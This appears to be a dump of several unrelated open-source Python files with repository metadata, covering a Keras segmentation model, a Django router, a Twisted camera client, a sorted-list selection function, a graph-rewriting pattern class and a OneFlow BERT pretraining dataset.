x = Conv2D(64, (3, 3), activation='relu', padding='same', name='deconv1_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(1, (3, 3), activation='sigmoid', padding='same', name='pred', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
model = Model(inputs=input_tensor, outputs=x)
return model
def build_refinement(encoder_decoder):
input_tensor = encoder_decoder.input
input = Lambda(lambda i: i[:, :, :, 0:3])(input_tensor)
x = Concatenate(axis=3)([input, encoder_decoder.output])
x = Conv2D(64, (3, 3), activation='relu', padding='same', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(1, (3, 3), activation='sigmoid', padding='same', name='refinement_pred', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
model = Model(inputs=input_tensor, outputs=x)
return model
if __name__ == '__main__':
with tf.device("/cpu:0"):
encoder_decoder = build_encoder_decoder()
print(encoder_decoder.summary())
plot_model(encoder_decoder, to_file='encoder_decoder.svg', show_layer_names=True, show_shapes=True)
with tf.device("/cpu:0"):
refinement = build_refinement(encoder_decoder)
print(refinement.summary())
plot_model(refinement, to_file='refinement.svg', show_layer_names=True, show_shapes=True)
parallel_model = multi_gpu_model(refinement, gpus=None)
print(parallel_model.summary())
plot_model(parallel_model, to_file='parallel_model.svg', show_layer_names=True, show_shapes=True)
K.clear_session()
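# --- Hedged illustration (not part of the original file) ---
# Minimal sketch of the ASPP (atrous spatial pyramid pooling) pattern used in
# build_encoder_decoder above: parallel dilated 3x3 convolutions, a 1x1 branch,
# and a global image-level branch, concatenated and fused by 1x1 convolutions.
# Filter counts and the input shape here are illustrative assumptions, not the
# original model's configuration.
import tensorflow as tf
from tensorflow.keras.layers import Concatenate, Conv2D, Input, Lambda
from tensorflow.keras.models import Model

def aspp_block(x, filters=64, rates=(6, 12, 18)):
    # Static spatial size, needed to resize the pooled branch back up.
    size = tuple(int(d) for d in x.shape[1:3])
    branches = [Conv2D(filters, (1, 1), activation='relu', padding='same')(x)]
    for r in rates:
        branches.append(Conv2D(filters, (3, 3), activation='relu',
                               padding='same', dilation_rate=r)(x))
    # Global average pooling branch, resized back to the feature-map size.
    pooled = Lambda(lambda t: tf.reduce_mean(t, [1, 2], keepdims=True))(x)
    pooled = Conv2D(filters, (1, 1), activation='relu', padding='same')(pooled)
    pooled = Lambda(lambda t: tf.image.resize(t, size))(pooled)
    branches.append(pooled)
    x = Concatenate(axis=3)(branches)
    return Conv2D(filters, (1, 1), activation='relu', padding='same')(x)

demo_in = Input(shape=(40, 40, 32))
demo = Model(inputs=demo_in, outputs=aspp_block(demo_in))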
| true
| true
|
790dc17972f0343866fcf1c4348d39c89d4aaf8e
| 358
|
py
|
Python
|
app/recipe/urls.py
|
Webins/recipe-app-api
|
9972d634e3d09969331d48180b6ae24e1dee3d6b
|
[
"MIT"
] | 1
|
2020-07-22T16:29:21.000Z
|
2020-07-22T16:29:21.000Z
|
app/recipe/urls.py
|
Webins/recipe-app-api
|
9972d634e3d09969331d48180b6ae24e1dee3d6b
|
[
"MIT"
] | null | null | null |
app/recipe/urls.py
|
Webins/recipe-app-api
|
9972d634e3d09969331d48180b6ae24e1dee3d6b
|
[
"MIT"
] | null | null | null |
from django.urls import path, include
from rest_framework.routers import DefaultRouter
from recipe import views
router = DefaultRouter()
router.register('tags', views.TagViewSet)
router.register('ingredients', views.IngredientViewSet)
router.register('recipe', views.RecipeViewSet)
app_name = 'recipe'
urlpatterns = [
path('', include(router.urls))
]
| 23.866667
| 55
| 0.77933
|
from django.urls import path, include
from rest_framework.routers import DefaultRouter
from recipe import views
router = DefaultRouter()
router.register('tags', views.TagViewSet)
router.register('ingredients', views.IngredientViewSet)
router.register('recipe', views.RecipeViewSet)
app_name = 'recipe'
urlpatterns = [
path('', include(router.urls))
]
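# --- Hedged illustration (not part of the original file) ---
# DefaultRouter derives route names from each viewset's queryset (or an
# explicit basename argument); assuming the standard DRF naming scheme
# ('<basename>-list' / '<basename>-detail') together with app_name above,
# the generated URLs can be reversed as, e.g.:
#   reverse('recipe:recipe-list')               # list/create endpoint
#   reverse('recipe:recipe-detail', args=[1])   # retrieve/update/delete endpoint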
| true
| true
|
790dc1ec4b631e70e3b7f9f8d7c83a86604e4e4a
| 4,903
|
py
|
Python
|
src/octopus/image/source.py
|
gar-syn/congo-lab
|
dc50af4e35903556bc8bc34dc23a7a708c1f5422
|
[
"MIT"
] | 1
|
2021-02-02T11:27:25.000Z
|
2021-02-02T11:27:25.000Z
|
src/octopus/image/source.py
|
gar-syn/congo-lab
|
dc50af4e35903556bc8bc34dc23a7a708c1f5422
|
[
"MIT"
] | 18
|
2021-02-01T11:35:15.000Z
|
2021-08-03T14:23:38.000Z
|
src/octopus/image/source.py
|
gar-syn/congo-lab
|
dc50af4e35903556bc8bc34dc23a7a708c1f5422
|
[
"MIT"
] | null | null | null |
# System Imports
import cv2
import json
from typing import Optional
# Library imports
import numpy
# Twisted Import
from twisted.internet import reactor, defer, threads, protocol
from twisted.internet.endpoints import TCP4ClientEndpoint
from twisted.internet.interfaces import IAddress
# Package Imports
from .data import Image, ColorSpace
class cv_webcam (object):
def __init__ (self, device, img_width, img_height):
self.device_index = device
self.img_width = img_width
self.img_height = img_height
self.name = "cv_webcam(%s)" % device
self.camera = None
@defer.inlineCallbacks
def connect (self, _protocolFactory):
if self.camera is None:
self.camera = yield threads.deferToThread(cv2.VideoCapture, self.device_index)
# Set picture capture dimensions
self.camera.set(3, self.img_width)
self.camera.set(4, self.img_height)
defer.returnValue(self)
@defer.inlineCallbacks
def image (self):
"""
Get an image from the camera.
Returns an Image object.
"""
try:
flag, img_array = yield threads.deferToThread(self.camera.read)
except SystemError:
return
if flag is False:
print ("No image")
return
defer.returnValue(Image(img_array, ColorSpace.BGR))
def disconnect (self):
threads.deferToThread(self.camera.release)
class _camera_proxy_protocol (protocol.Protocol):
_state: str
_buffer: bytes = b''
_image_callback: Optional[defer.Deferred] = None
_camera_id: Optional[bytes] = None
def setCameraId(self, camera_id: int):
self._camera_id = str(camera_id).encode()
self.requestFormat()
# def connectionMade(self):
# if self._camera_id is not None:
# self.requestFormat()
def dataReceived(self, data: bytes):
"""
Byte 1: command
Byte 2-5: length
Byte 6+: data
"""
self._buffer += data
if len(self._buffer) > 5:
command = chr(self._buffer[0])
length = int.from_bytes(self._buffer[1:5], byteorder = 'big')
if len(self._buffer) >= length + 5:
data = self._buffer[5 : 5 + length]
self._buffer = self._buffer[5 + length : ]
if command == 'F':
self.formatReceived(data)
elif command == 'I':
self.imageReceived(data)
def formatReceived (self, data: bytes):
image_format = json.loads(data.decode())
if image_format['channels'] == 1:
self._image_shape = (image_format['height'], image_format['width'])
else:
self._image_shape = (
image_format['height'],
image_format['width'],
image_format['channels']
)
self._image_colorspace = image_format['colorspace']
def imageReceived (self, data: bytes):
try:
img_data = numpy.reshape(
numpy.frombuffer(data, dtype = numpy.uint8),
newshape = self._image_shape
)
self._image_callback.callback(img_data)
except (AttributeError, defer.AlreadyCalledError) as e:
# No callback, or callback already done. (Unexpected image data).
pass
except Exception as e:
try:
self._image_callback.errback(e)
except defer.AlreadyCalledError:
pass
def requestFormat (self):
self.transport.write(b'F' + self._camera_id + b'\n')
def requestImage (self):
self._image_callback = defer.Deferred()
self.transport.write(b'I' + self._camera_id + b'\n')
return self._image_callback
class camera_proxy (object):
def __init__ (self, host, port, camera_id):
self.point = TCP4ClientEndpoint(reactor, host, port)
self.name = f"camera_proxy({host!s}, {port!s})"
self.camera_id = camera_id
@defer.inlineCallbacks
def connect (self, _protocolFactory):
self._protocol = yield self.point.connect(
protocol.Factory.forProtocol(_camera_proxy_protocol)
)
self._protocol.setCameraId(self.camera_id)
# yield self._protocol._get_format_information()
defer.returnValue(self)
@defer.inlineCallbacks
def image (self):
"""
Get an image from the camera.
        Returns an Image object.
"""
try:
img_array = yield self._protocol.requestImage()
except Exception as e:
print('Exception fetching image', e)
return
defer.returnValue(Image(img_array, ColorSpace.BGR))
def disconnect (self):
threads.deferToThread(self.camera.release)
| 29.011834
| 90
| 0.598409
|
import cv2
import json
from typing import Optional
import numpy
from twisted.internet import reactor, defer, threads, protocol
from twisted.internet.endpoints import TCP4ClientEndpoint
from twisted.internet.interfaces import IAddress
from .data import Image, ColorSpace
class cv_webcam (object):
def __init__ (self, device, img_width, img_height):
self.device_index = device
self.img_width = img_width
self.img_height = img_height
self.name = "cv_webcam(%s)" % device
self.camera = None
@defer.inlineCallbacks
def connect (self, _protocolFactory):
if self.camera is None:
self.camera = yield threads.deferToThread(cv2.VideoCapture, self.device_index)
self.camera.set(3, self.img_width)
self.camera.set(4, self.img_height)
defer.returnValue(self)
@defer.inlineCallbacks
def image (self):
try:
flag, img_array = yield threads.deferToThread(self.camera.read)
except SystemError:
return
if flag is False:
print ("No image")
return
defer.returnValue(Image(img_array, ColorSpace.BGR))
def disconnect (self):
threads.deferToThread(self.camera.release)
class _camera_proxy_protocol (protocol.Protocol):
_state: str
_buffer: bytes = b''
_image_callback: Optional[defer.Deferred] = None
_camera_id: Optional[bytes] = None
def setCameraId(self, camera_id: int):
self._camera_id = str(camera_id).encode()
self.requestFormat()
def dataReceived(self, data: bytes):
self._buffer += data
if len(self._buffer) > 5:
command = chr(self._buffer[0])
length = int.from_bytes(self._buffer[1:5], byteorder = 'big')
if len(self._buffer) >= length + 5:
data = self._buffer[5 : 5 + length]
self._buffer = self._buffer[5 + length : ]
if command == 'F':
self.formatReceived(data)
elif command == 'I':
self.imageReceived(data)
def formatReceived (self, data: bytes):
image_format = json.loads(data.decode())
if image_format['channels'] == 1:
self._image_shape = (image_format['height'], image_format['width'])
else:
self._image_shape = (
image_format['height'],
image_format['width'],
image_format['channels']
)
self._image_colorspace = image_format['colorspace']
def imageReceived (self, data: bytes):
try:
img_data = numpy.reshape(
numpy.frombuffer(data, dtype = numpy.uint8),
newshape = self._image_shape
)
self._image_callback.callback(img_data)
except (AttributeError, defer.AlreadyCalledError) as e:
pass
except Exception as e:
try:
self._image_callback.errback(e)
except defer.AlreadyCalledError:
pass
def requestFormat (self):
self.transport.write(b'F' + self._camera_id + b'\n')
def requestImage (self):
self._image_callback = defer.Deferred()
self.transport.write(b'I' + self._camera_id + b'\n')
return self._image_callback
class camera_proxy (object):
def __init__ (self, host, port, camera_id):
self.point = TCP4ClientEndpoint(reactor, host, port)
self.name = f"camera_proxy({host!s}, {port!s})"
self.camera_id = camera_id
@defer.inlineCallbacks
def connect (self, _protocolFactory):
self._protocol = yield self.point.connect(
protocol.Factory.forProtocol(_camera_proxy_protocol)
)
self._protocol.setCameraId(self.camera_id)
defer.returnValue(self)
@defer.inlineCallbacks
def image (self):
try:
img_array = yield self._protocol.requestImage()
except Exception as e:
print('Exception fetching image', e)
return
defer.returnValue(Image(img_array, ColorSpace.BGR))
def disconnect (self):
threads.deferToThread(self.camera.release)
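# --- Hedged illustration (not part of the original file) ---
# Standalone sketch of the wire format parsed by dataReceived above: one
# command byte, a 4-byte big-endian payload length, then the payload. Unlike
# the original (which handles at most one frame per call), this loop drains
# every complete frame from the buffer.
def parse_frames(buffer: bytes):
    frames = []
    while len(buffer) > 5:
        command = chr(buffer[0])
        length = int.from_bytes(buffer[1:5], byteorder='big')
        if len(buffer) < 5 + length:
            break  # incomplete frame: wait for more data
        frames.append((command, buffer[5:5 + length]))
        buffer = buffer[5 + length:]
    return frames, buffer

frames, rest = parse_frames(b'I' + (5).to_bytes(4, 'big') + b'hello')
assert frames == [('I', b'hello')] and rest == b''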
| true
| true
|
790dc1f7c437946d2beb40380f654fcc078627c4
| 742
|
py
|
Python
|
projects/g3h2-algorithm/practice1/4.py
|
keybrl/xdu-coursework
|
9d0e905bef28c18d87d3b97643de0d32f9f08ee0
|
[
"MIT"
] | null | null | null |
projects/g3h2-algorithm/practice1/4.py
|
keybrl/xdu-coursework
|
9d0e905bef28c18d87d3b97643de0d32f9f08ee0
|
[
"MIT"
] | null | null | null |
projects/g3h2-algorithm/practice1/4.py
|
keybrl/xdu-coursework
|
9d0e905bef28c18d87d3b97643de0d32f9f08ee0
|
[
"MIT"
] | null | null | null |
def get_the_ith_largest(s1: list, s2: list, i: int):
m = len(s1)
n = len(s2)
if i > m + n:
raise IndexError('list index out of range')
i -= 1
l1 = 0
r1 = i if m - 1 >= i else m - 1
while l1 <= r1:
c1 = (l1 + r1) // 2
c1_f = i - c1 - 1
c1_b = i - c1
if c1_f >= 0 and (c1_f >= n or s2[c1_f] > s1[c1]):
l1 = c1 + 1
elif 0 <= c1_b < n and s2[c1_b] < s1[c1]:
r1 = c1 - 1
else:
return s1[c1]
return get_the_ith_largest(s2, s1, i + 1)
if __name__ == '__main__':
s1_test = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
s2_test = [2, 3, 4, 6, 10, 20, 100]
print(get_the_ith_largest(s2_test, s1_test, 8))
| 25.586207
| 65
| 0.467655
|
def get_the_ith_largest(s1: list, s2: list, i: int):
m = len(s1)
n = len(s2)
if i > m + n:
raise IndexError('list index out of range')
i -= 1
l1 = 0
r1 = i if m - 1 >= i else m - 1
while l1 <= r1:
c1 = (l1 + r1) // 2
c1_f = i - c1 - 1
c1_b = i - c1
if c1_f >= 0 and (c1_f >= n or s2[c1_f] > s1[c1]):
l1 = c1 + 1
elif 0 <= c1_b < n and s2[c1_b] < s1[c1]:
r1 = c1 - 1
else:
return s1[c1]
return get_the_ith_largest(s2, s1, i + 1)
if __name__ == '__main__':
s1_test = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
s2_test = [2, 3, 4, 6, 10, 20, 100]
print(get_the_ith_largest(s2_test, s1_test, 8))
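# --- Hedged illustration (not part of the original file) ---
# Brute-force cross-check, assuming get_the_ith_largest selects the i-th
# smallest element (1-based) of two sorted lists of distinct values.
import random

for _ in range(100):
    a = sorted(random.sample(range(0, 1000), random.randint(1, 20)))
    b = sorted(random.sample(range(1000, 2000), random.randint(1, 20)))
    merged = sorted(a + b)
    i = random.randint(1, len(merged))
    assert get_the_ith_largest(a, b, i) == merged[i - 1]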
| true
| true
|
790dc2d561a18c3dd73fe88534f970fb94f4432e
| 2,498
|
py
|
Python
|
UMLRT2Kiltera_MM/Properties/from_thesis/HMM10_then1_IsolatedLHS.py
|
levilucio/SyVOLT
|
7526ec794d21565e3efcc925a7b08ae8db27d46a
|
[
"MIT"
] | 3
|
2017-06-02T19:26:27.000Z
|
2021-06-14T04:25:45.000Z
|
UMLRT2Kiltera_MM/Properties/from_thesis/HMM10_then1_IsolatedLHS.py
|
levilucio/SyVOLT
|
7526ec794d21565e3efcc925a7b08ae8db27d46a
|
[
"MIT"
] | 8
|
2016-08-24T07:04:07.000Z
|
2017-05-26T16:22:47.000Z
|
UMLRT2Kiltera_MM/Properties/from_thesis/HMM10_then1_IsolatedLHS.py
|
levilucio/SyVOLT
|
7526ec794d21565e3efcc925a7b08ae8db27d46a
|
[
"MIT"
] | 1
|
2019-10-31T06:00:23.000Z
|
2019-10-31T06:00:23.000Z
|
from core.himesis import Himesis, HimesisPreConditionPatternLHS
import uuid
class HMM10_then1_IsolatedLHS(HimesisPreConditionPatternLHS):
def __init__(self):
"""
Creates the himesis graph representing the AToM3 model HMM10_then1_IsolatedLHS.
"""
# Flag this instance as compiled now
self.is_compiled = True
super(HMM10_then1_IsolatedLHS, self).__init__(name='HMM10_then1_IsolatedLHS', num_nodes=0, edges=[])
# Add the edges
self.add_edges([])
# Set the graph attributes
self["mm__"] = ['MT_pre__FamiliesToPersonsMM', 'MoTifRule']
self["MT_constraint__"] = """#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
"""
self["name"] = """"""
self["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'MM10_then1')
# Set the node attributes
# Add the attribute equations
self["equations"] = []
def constraint(self, PreNode, graph):
"""
Executable constraint code.
@param PreNode: Function taking an integer as parameter
and returns the node corresponding to that label.
"""
#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
| 43.068966
| 125
| 0.5004
|
from core.himesis import Himesis, HimesisPreConditionPatternLHS
import uuid
class HMM10_then1_IsolatedLHS(HimesisPreConditionPatternLHS):
def __init__(self):
self.is_compiled = True
super(HMM10_then1_IsolatedLHS, self).__init__(name='HMM10_then1_IsolatedLHS', num_nodes=0, edges=[])
self.add_edges([])
self["mm__"] = ['MT_pre__FamiliesToPersonsMM', 'MoTifRule']
self["MT_constraint__"] = """#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
"""
self["name"] = """"""
self["GUID__"] = uuid.uuid3(uuid.NAMESPACE_DNS,'MM10_then1')
self["equations"] = []
def constraint(self, PreNode, graph):
return True
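    # --- Hedged illustration (not part of the original file) ---
    # Minimal usage sketch, assuming core.himesis is importable: the compiled
    # pattern is instantiated and its (trivially true) constraint evaluated.
    #   lhs = HMM10_then1_IsolatedLHS()
    #   lhs.constraint(PreNode=None, graph=None)   # -> True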
| true
| true
|
790dc41206388cb2bb9037ec3e469e9e586a2a2e
| 14,501
|
py
|
Python
|
libai/data/datasets/bert_dataset.py
|
Oneflow-Inc/libai
|
e473bd3962f07b1e37232d2be39c8257df0ec0f3
|
[
"Apache-2.0"
] | 55
|
2021-12-10T08:47:06.000Z
|
2022-03-28T09:02:15.000Z
|
libai/data/datasets/bert_dataset.py
|
Oneflow-Inc/libai
|
e473bd3962f07b1e37232d2be39c8257df0ec0f3
|
[
"Apache-2.0"
] | 106
|
2021-11-03T05:16:45.000Z
|
2022-03-31T06:16:23.000Z
|
libai/data/datasets/bert_dataset.py
|
Oneflow-Inc/libai
|
e473bd3962f07b1e37232d2be39c8257df0ec0f3
|
[
"Apache-2.0"
] | 13
|
2021-12-29T08:12:08.000Z
|
2022-03-28T06:59:45.000Z
|
# coding=utf-8
# Copyright 2021 The OneFlow Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""dataset for bert."""
import collections
import math
import numpy as np
import oneflow as flow
from libai.data.data_utils import SentenceIndexedDataset
from libai.data.structures import DistTensorData, Instance
MaskedLmInstance = collections.namedtuple("MaskedLmInstance", ["index", "label"])
def is_start_piece(piece):
"""Check if the current word piece is the starting piece (BERT)."""
# When a word has been split into
# WordPieces, the first token does not have any marker and any subsequence
# tokens are prefixed with ##. So whenever we see the ## token, we
# append it to the previous set of word indexes.
return not piece.startswith("##")
class BertDataset(flow.utils.data.Dataset):
"""Dataset containing sentence pairs for BERT training.
Each index corresponds to a randomly generated sentence pair.
Args:
tokenizer: Tokenizer to use.
data_prefix: Path to the training dataset.
indexed_dataset: Indexed dataset to use.
max_seq_length: Maximum length of the sequence. All values are padded to
this length. Defaults to 512.
mask_lm_prob: Probability to mask tokens. Defaults to 0.15.
short_seq_prob: Probability of producing a short sequence. Defaults to 0.0.
max_preds_per_seq: Maximum number of mask tokens in each sentence. Defaults to None.
seed: Seed for random number generator for reproducibility. Defaults to 1234.
binary_head: Specifies whether the underlying dataset
generates a pair of blocks along with a sentence_target or not.
Setting it to True assumes that the underlying dataset generates a
label for the pair of sentences which is surfaced as
sentence_target. Defaults to True.
"""
def __init__(
self,
tokenizer,
data_prefix,
indexed_dataset,
max_seq_length=512,
mask_lm_prob=0.15,
short_seq_prob=0.0,
max_preds_per_seq=None,
seed=1234,
binary_head=True,
):
self.seed = seed
self.mask_lm_prob = mask_lm_prob
self.max_seq_length = max_seq_length
self.short_seq_prob = short_seq_prob
self.binary_head = binary_head
if max_preds_per_seq is None:
max_preds_per_seq = math.ceil(max_seq_length * mask_lm_prob / 10) * 10
self.max_preds_per_seq = max_preds_per_seq
self.dataset = SentenceIndexedDataset(
data_prefix,
indexed_dataset,
max_seq_length=self.max_seq_length - 3,
short_seq_prob=self.short_seq_prob,
binary_head=self.binary_head,
)
self.tokenizer = tokenizer
self.vocab_id_list = list(tokenizer.get_vocab().values())
self.cls_id = tokenizer.cls_token_id
self.sep_id = tokenizer.sep_token_id
self.mask_id = tokenizer.mask_token_id
self.pad_id = tokenizer.pad_token_id
def __len__(self):
return len(self.dataset)
def __getitem__(self, idx):
# Note that this rng state should be numpy and not python since
# python randint is inclusive whereas the numpy one is exclusive.
np_rng = np.random.RandomState(seed=(self.seed + idx))
sents = self.dataset[idx]
if self.binary_head:
tokens_a, tokens_b, is_next_random = self.create_random_sentence_pair(sents, np_rng)
else:
tokens_a = []
for j in range(len(sents)):
tokens_a.extend(sents[j])
tokens_b = []
is_next_random = False
tokens_a, tokens_b = self.truncate_seq_pair(
tokens_a, tokens_b, self.max_seq_length - 3, np_rng
)
tokens, token_types = self.create_tokens_and_token_types(tokens_a, tokens_b)
tokens, masked_positions, masked_labels = self.create_masked_lm_predictions(tokens, np_rng)
(
tokens,
token_types,
labels,
padding_mask,
loss_mask,
) = self.pad_and_convert_to_tensor(tokens, token_types, masked_positions, masked_labels)
sample = Instance(
input_ids=DistTensorData(tokens),
attention_mask=DistTensorData(padding_mask),
tokentype_ids=DistTensorData(token_types),
ns_labels=DistTensorData(
flow.tensor(int(is_next_random), dtype=flow.long), placement_idx=-1
),
lm_labels=DistTensorData(labels, placement_idx=-1),
loss_mask=DistTensorData(loss_mask, placement_idx=-1),
)
return sample
def create_random_sentence_pair(self, sample, np_rng):
num_sentences = len(sample)
assert num_sentences > 1, "make sure each sample has at least two sentences."
a_end = 1
if num_sentences >= 3:
a_end = np_rng.randint(1, num_sentences)
tokens_a = []
for j in range(a_end):
tokens_a.extend(sample[j])
tokens_b = []
for j in range(a_end, num_sentences):
tokens_b.extend(sample[j])
is_next_random = False
if np_rng.random() < 0.5:
is_next_random = True
tokens_a, tokens_b = tokens_b, tokens_a
return tokens_a, tokens_b, is_next_random
def truncate_seq_pair(self, tokens_a, tokens_b, max_num_tokens, np_rng):
"""Truncate sequence pair to a maximum sequence length."""
len_a, len_b = len(tokens_a), len(tokens_b)
while True:
total_length = len_a + len_b
if total_length <= max_num_tokens:
break
if len_a > len_b:
trunc_tokens = tokens_a
len_a -= 1
else:
trunc_tokens = tokens_b
len_b -= 1
if np_rng.random() < 0.5:
trunc_tokens.pop(0) # remove the first element
else:
trunc_tokens.pop() # remove the last element
return tokens_a, tokens_b
def create_tokens_and_token_types(self, tokens_a, tokens_b):
"""Merge segments A and B, add [CLS] and [SEP] and build token types."""
tokens = [self.cls_id] + tokens_a + [self.sep_id]
token_types = [0] * (len(tokens_a) + 2)
if len(tokens_b) > 0:
tokens = tokens + tokens_b + [self.sep_id]
token_types = token_types + [1] * (len(tokens_b) + 1)
return tokens, token_types
def mask_token(self, idx, tokens, np_rng):
"""
Helper function to mask `idx` token from `tokens` according to
section 3.3.1 of https://arxiv.org/pdf/1810.04805.pdf
"""
label = tokens[idx]
if np_rng.random() < 0.8:
new_label = self.mask_id
else:
if np_rng.random() < 0.5:
new_label = label
else:
new_label = np_rng.choice(self.vocab_id_list)
tokens[idx] = new_label
return label
def create_masked_lm_predictions(
self,
tokens,
np_rng,
max_ngrams=3,
do_whole_word_mask=True,
favor_longer_ngram=False,
geometric_dist=False,
):
"""Creates the predictions for the masked LM objective.
Note: Tokens here are vocab ids and not text tokens."""
cand_indexes = []
token_boundary = [0] * len(tokens)
new_tokens = []
for (i, token) in enumerate(tokens):
new_tokens.append(token % len(self.tokenizer))
if token == self.cls_id or token == self.sep_id:
token_boundary[i] = 1
continue
            # Whole Word Masking means that we mask all of the wordpieces
            # corresponding to an original word.
#
# Note that Whole Word Masking does *not* change the training code
# at all -- we still predict each WordPiece independently, softmaxed
# over the entire vocabulary.
if (
do_whole_word_mask
and len(cand_indexes) >= 1
and not is_start_piece(self.tokenizer._convert_id_to_token(token))
):
cand_indexes[-1].append(i)
else:
cand_indexes.append([i])
if is_start_piece(self.tokenizer._convert_id_to_token(token)):
token_boundary[i] = 1
tokens = new_tokens
masked_positions = []
masked_labels = []
output_tokens = list(tokens)
if self.mask_lm_prob == 0:
return output_tokens, masked_positions, masked_labels
cand_indexes = []
for (i, token) in enumerate(tokens):
if token == self.cls_id or token == self.sep_id:
continue
            # Whole Word Masking means that we mask all of the wordpieces
            # corresponding to an original word.
#
# Note that Whole Word Masking does *not* change the training code
# at all -- we still predict each WordPiece independently, softmaxed
# over the entire vocabulary.
if do_whole_word_mask and len(cand_indexes) >= 1 and token_boundary[i] == 0:
cand_indexes[-1].append(i)
else:
cand_indexes.append([i])
num_to_predict = min(
self.max_preds_per_seq, max(1, int(round(len(tokens) * self.mask_lm_prob)))
)
ngrams = np.arange(1, max_ngrams + 1, dtype=np.int64)
if not geometric_dist:
# By default, we set the probilities to favor shorter ngram sequences.
pvals = 1.0 / np.arange(1, max_ngrams + 1)
pvals /= pvals.sum(keepdims=True)
if favor_longer_ngram:
pvals = pvals[::-1]
ngram_indexes = []
for idx in range(len(cand_indexes)):
ngram_index = []
for n in ngrams:
ngram_index.append(cand_indexes[idx : idx + n])
ngram_indexes.append(ngram_index)
np_rng.shuffle(ngram_indexes)
masked_lms = []
covered_indexes = set()
for cand_index_set in ngram_indexes:
if len(masked_lms) >= num_to_predict:
break
if not cand_index_set:
continue
# Skip current piece if they are covered in lm masking or previous ngrams.
for index_set in cand_index_set[0]:
for index in index_set:
if index in covered_indexes:
continue
if not geometric_dist:
n = np_rng.choice(
ngrams[: len(cand_index_set)],
p=pvals[: len(cand_index_set)]
/ pvals[: len(cand_index_set)].sum(keepdims=True),
)
else:
# Sampling "n" from the geometric distribution and clipping it to
# the max_ngrams. Using p=0.2 default from the SpanBERT paper
# https://arxiv.org/pdf/1907.10529.pdf (Sec 3.1)
n = min(np_rng.geometric(0.2), max_ngrams)
index_set = sum(cand_index_set[n - 1], [])
n -= 1
# Repeatedly looking for a candidate that does not exceed the
# maximum number of predictions by trying shorter ngrams.
while len(masked_lms) + len(index_set) > num_to_predict:
if n == 0:
break
index_set = sum(cand_index_set[n - 1], [])
n -= 1
# If adding a whole-word mask would exceed the maximum number of
# predictions, then just skip this candidate.
if len(masked_lms) + len(index_set) > num_to_predict:
continue
is_any_index_covered = False
for index in index_set:
if index in covered_indexes:
is_any_index_covered = True
break
if is_any_index_covered:
continue
for index in index_set:
covered_indexes.add(index)
label = self.mask_token(index, output_tokens, np_rng)
masked_lms.append(MaskedLmInstance(index=index, label=label))
masked_lms = sorted(masked_lms, key=lambda x: x.index)
for p in masked_lms:
masked_positions.append(p.index)
masked_labels.append(p.label)
return output_tokens, masked_positions, masked_labels
def pad_and_convert_to_tensor(self, tokens, token_types, masked_positions, masked_labels):
"""Pad sequences and convert them to tensor."""
# check
num_tokens = len(tokens)
num_pad = self.max_seq_length - num_tokens
assert num_pad >= 0
assert len(token_types) == num_tokens
assert len(masked_positions) == len(masked_labels)
# tokens and token types
filler = [self.pad_id] * num_pad
tokens = flow.tensor(tokens + filler, dtype=flow.long)
token_types = flow.tensor(token_types + filler, dtype=flow.long)
# padding mask
padding_mask = flow.tensor([1] * num_tokens + [0] * num_pad, dtype=flow.long)
# labels and loss mask
labels = [-1] * self.max_seq_length
loss_mask = [0] * self.max_seq_length
for idx, label in zip(masked_positions, masked_labels):
assert idx < num_tokens
labels[idx] = label
loss_mask[idx] = 1
labels = flow.tensor(labels, dtype=flow.long)
loss_mask = flow.tensor(loss_mask, dtype=flow.long)
return tokens, token_types, labels, padding_mask, loss_mask
@property
def supports_prefetch(self):
return self.dataset.supports_prefetch
def prefetch(self, indices):
self.dataset.prefetch(indices)
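# --- Hedged illustration (not part of the original file) ---
# Standalone sketch of the masking rule implemented by mask_token above,
# using the same nested coin flips: p=0.8 replace with [MASK], otherwise
# p=0.5 keep the token / p=0.5 substitute a random vocabulary id.
import numpy as np

def mask_token_demo(tokens, idx, mask_id, vocab_ids, rng):
    label = tokens[idx]
    if rng.random() < 0.8:
        tokens[idx] = mask_id
    elif rng.random() >= 0.5:
        tokens[idx] = rng.choice(vocab_ids)
    return label  # the original id becomes the LM label

rng = np.random.RandomState(0)
toks = [5, 6, 7]
assert mask_token_demo(toks, 1, mask_id=103, vocab_ids=[1, 2, 3], rng=rng) == 6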
| 36.804569
| 99
| 0.603614
|
import collections
import math
import numpy as np
import oneflow as flow
from libai.data.data_utils import SentenceIndexedDataset
from libai.data.structures import DistTensorData, Instance
MaskedLmInstance = collections.namedtuple("MaskedLmInstance", ["index", "label"])
def is_start_piece(piece):
    return not piece.startswith("##")
class BertDataset(flow.utils.data.Dataset):
    def __init__(
self,
tokenizer,
data_prefix,
indexed_dataset,
